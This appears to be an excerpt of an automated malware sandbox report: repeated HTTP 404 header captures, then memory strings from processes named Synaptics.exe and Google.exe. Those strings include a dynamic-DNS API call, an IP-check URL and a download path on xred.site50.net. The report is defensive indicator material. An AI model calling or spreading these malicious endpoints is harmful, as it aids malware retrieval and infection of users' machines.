                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC61pQVVNa3vxqZPAlo0auJ9JiKvd_6j3JrQbOF4iNecks9NJUje_kF-gzk8HZxySJKFwEwV41YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:36 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-IkRyUo5EmdZJxsmX14raSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC66P3HpfYHCFpNAm2ol3204aHvW-CKGNGo-232F3Pk5VHVL5GIkEyrBQZGTTc9_0Wu7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6JzYFZ4z3BlnIkEz-L5xVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6OvPLq_49AU8X_zbQTgnhpkWfKv5xq2n6pn-TiMn2cpRAuyWF9I0Gah7OzSjBnNc8SIYyDoKgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:38 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_iB_8PufKkFaGkso8o2S-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ORFCnUXer_NBTEV4_VBFNLSGiYZUcNyk3A6wW0Rgfql0LvSw4dTTYQJeN1V5wUSWoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:38 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-VMdnK8K4cmbFBXnAEf02RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5qE4Nx_iXxCHnBI9DZi1XlPA2wvleKFKfTJZ8BrMlCGgdXWMyv6ySsschhsP67qAO6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:39 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-pVZRW9RhZz9WVcbuWr2-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6UlvWyEt_GMjgNqOse2oAGV9_aBJtksMds6RcqiBqRE4DcuCphIZUch1OLyBIh3FnUY_iWLsIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Lt5DUs7HtH5sPJ7f_7o2iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5aGZvc6Q3HXDyiqjVeujOVzKCcM5jc-VHfg-lYVKvybX-DHLAQtvv5UErHpsUb9bCEsDrrwDoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:41 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-U2wGyhEFfG5grkj82CXYbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Up9kJdGl2f_6u8XE9-SjIQV7Oz-cOixI9wc8-mV9solDlqGx8m9ligb_VlbQR-vlJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:42 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-MLp9LyF43cM-joHmVzG5Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6VkEvHbZos701eT0OGTOWSVT8PbAfv4kMwHaqCFzimZpN2ef6sCO9TD4sCQ6pKz4CRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:43 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-S_68dQhXVHsYkNKLLBBgXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6gfgsg9caI1RW8in2-UWqvpFgCANcOGvJ4BEF6CnaBOCT2Ek3FukjJcYqidXhAW_5IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:43 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-SwJMLa3viKzdOXhX68BPBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ipvl2OuaXA-EONjzF8TjaTuY7bPFrzdpEMXAtoApcUjov7GHF53uavlxoAWHI-9YfContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:44 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-BlXMELQcQaqmM58x89caGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5EBG23dgdmR367lMpCot7qExIGoyc8cgx9D8ENHpF9dUmiTdf1cK7-XEuC7NqpputpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:45 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bkiRd-8iw6BvN8uw5T2ebg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Mdk3JnpnMJ-sq7WyUAvEmOw6i-hDql2XfBN1krJKJX8dnPjuSASnXkis0zEsE9tr7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-pOTNL-hQHg-bAvYH2UaBkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5-GJyMa3vimJ8-b3VX4FV45gQPdOyrdHt9hZoihy7d7AmNkdjiq9Iee3Z_DHJTA2OYr_fm-eAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:46 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-g3TMxp-Uidph3MTS-EuwIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC58NE_J6-gh5CXVU6EQJUBBe_Rv21O0ADXUiVNq_X4SdrMVCUx85NwZBAswMrwewlogContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:46 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-FamdA6oRxriUznRJjhQRSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7w9XFUSll-1KK49D6GwgDSOVXpXvVVi9o_pBGcE-o8-P2843QqHOsigNzEZ0HZmLsjPx8So9QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3hNQjLAx7BCRxjBHP9_RlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ig0Hg9Sua_lGMyjQp4zW3AzwzA1n2c-D4Q2s5Ddq9vJywH2D5pAgkMkkjpy4dwPydContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:49 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-XlCrI5HnQ6PqhQFlB54k6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6mH94JekuDTn1UfEbwtYFPpFcJizbuLapc1Fm63fNpcrcESeov6U-LNd4b_socvB_SContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:57 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZyUy83hu9PffS63YEdemgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6SUhPWWbAXX2Ngyxkqp9LCxsyg0zxCvAbw1wU_6MK4aUdL1C_3d0dH2nCeOblQMN0nQD9XPG0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:57 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-08ocrlm4UfArBFAwF3sPvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: wscript.exe, 00000000.00000002.1495561900.000001C7E50D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978BC
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978X
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978rxb$e
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/5
                            Source: Google.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
